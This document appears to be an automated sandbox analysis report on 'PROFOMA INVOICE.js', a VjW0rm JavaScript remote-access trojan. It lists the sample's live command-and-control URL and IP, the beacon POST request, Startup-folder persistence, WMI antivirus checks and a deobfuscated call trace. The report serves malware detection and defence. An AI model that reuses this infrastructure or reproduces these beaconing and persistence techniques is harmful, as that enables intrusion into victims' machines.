Windows Analysis Report
PROFOMA INVOICE.js

Overview

General Information

Sample name: PROFOMA INVOICE.js
Analysis ID: 1430781
MD5: f019c6926a0098f5c5e216a08bf33f3b
SHA1: 9a2ff7851175bb4bb47476cd2e245f2f5174f325
SHA256: 585b8889a2953abaa9eb16f62c828b755587ac9f54ca3c08ccc9f4e5581ec20a
Tags: jsVjw0rm
Infos:

Detection

VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: VjW0rm
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected VjW0rm
C2 URLs / IPs found in malware configuration
Drops script or batch files to the startup folder
JavaScript source code contains functionality to check for AV products
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory

Classification

Name Description Attribution Blogpost URLs Link
Vjw0rm VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm). No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm

AV Detection
barindex
Found malware configuration
Source: amsi64_7400.amsi.csv Malware Configuration Extractor: VjW0rm {"C2 url": "http://vjwmaster.duckdns.org:9987/Vre"}
Multi AV Scanner detection for domain / URL
Source: http://vjwmaster.duckdns.org:9987/Vre Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: PROFOMA INVOICE.js ReversingLabs: Detection: 21%
JavaScript source code contains functionality to check for AV products
Source: PROFOMA INVOICE.js Argument value : ['"AntiVirusProduct"'] Go to definition
Source: PROFOMA INVOICE.js Argument value : ['"AntiVirusProduct"'] Go to definition
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49709 -> 91.92.255.61:9987
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49711 -> 91.92.255.61:9987
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49712 -> 91.92.255.61:9987
Source: Traffic Snort IDS: 2828283 ETPRO TROJAN vjw0rm Checkin 192.168.2.10:49713 -> 91.92.255.61:9987
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 91.92.255.61 9987 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://vjwmaster.duckdns.org:9987/Vre
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Source: PROFOMA INVOICE.js Return value : ['"send"'] Go to definition
Source: PROFOMA INVOICE.js Argument value : ['"http://vjwmaster.duckdns.org:9987/Vre"', '"POST","http://vjwmaster.duckdns.org:9987/Vre",false', '"http://vjwmaster.duckdns.org:9987/","Vre"'] Go to definition
Source: PROFOMA INVOICE.js Argument value : ['"User-Agent:","Admin_B81A4609\\user-PC\\user\\Microsoft Windows 10 Pro\\Windows Defender\\\\YES\\FALSE\\"'] Go to definition
Source: PROFOMA INVOICE.js Argument value : ['"http://vjwmaster.duckdns.org:9987/Vre"', '"http://vjwmaster.duckdns.org:9987/","Vre"'] Go to definition
Uses dynamic DNS services
Source: unknown DNS query: name: vjwmaster.duckdns.org
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 9987
Source: unknown Network traffic detected: HTTP traffic on port 9987 -> 49709
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49709 -> 91.92.255.61:9987
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: THEZONEBG THEZONEBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: vjwmaster.duckdns.org
Source: unknown HTTP traffic detected: POST /Vre HTTP/1.1Accept: */*User-Agent: Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: vjwmaster.duckdns.org:9987Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: PROFOMA INVOICE.js String found in binary or memory: http://javascriptobfuscator.com

System Summary
barindex
Sample has a suspicious name (potential lure to open the executable)
Source: PROFOMA INVOICE.js Static file information: Suspicious name
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: PROFOMA INVOICE.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.expl.evad.winJS@4/4@2/1
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\PROFOMA INVOICE.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PROFOMA INVOICE.js ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PROFOMA INVOICE.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\PROFOMA INVOICE.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\PROFOMA INVOICE.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PROFOMA INVOICE.js"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: SetRequestHeader a0:%22User-Agent%3A%22 a1:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5CYES%5CFALSE%5C%22");IServerXMLHTTPRequest2.setRequestHeader("User-Agent:", "Admin_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:11367 o: f:SetRequestHeader r:undefined");ITextStream.WriteLine(" entry:11354 f:dX a0:661 a1:%22BC%5DA%22");ITextStream.WriteLine(" exit:11354 f:dX r:%22send%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:11350 o: f:send a0:%22%22");IServerXMLHTTPRequest2.send("");ISWbemObjectEx._01800001();ITextStream.WriteLine(" exit:11652 f:bE r:%22Windows%20Defender%22");ITextStream.WriteLine(" exit:12072 o:%5Bobject%20Object%5D f:hmmnp r:%22Windows%20Defender%22");ITextStream.WriteLine(" entry:11931 o:%5Bobject%20Object%5D f:Wwzjt a0:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5C%22 a1:%22Windows%20Defender%22");ITextStream.WriteLine(" exec:11588 f:");ITextStream.WriteLine(" exit:11931 o:%5Bobject%20Object%5D f:Wwzjt r:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%22");ITextStream.WriteLine(" entry:11921 o:%5Bobject%20Object%5D f:mPnpC a0:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%22 a1:%22%5C%22");ITextStream.WriteLine(" exec:11578 f:");ITextStream.WriteLine(" exit:11921 o:%5Bobject%20Object%5D f:mPnpC r:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%22");ITextStream.WriteLine(" entry:11911 o:%5Bobject%20Object%5D f:kDrBx a0:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%22 a1:%22%5C%22");ITextStream.WriteLine(" exec:11435 f:");ITextStream.WriteLine(" exit:11911 o:%5Bobject%20Object%5D f:kDrBx r:%22Admin_B81A4609%5Cuser-PC%5Cuser%5CMicrosoft%20Windows%2010%20Pro%5CWindows%20Defender%5C%5C%22");ITextStream.WriteLine(" entry:11901 o:%5Bobject%20Object%5D f:gRgZg 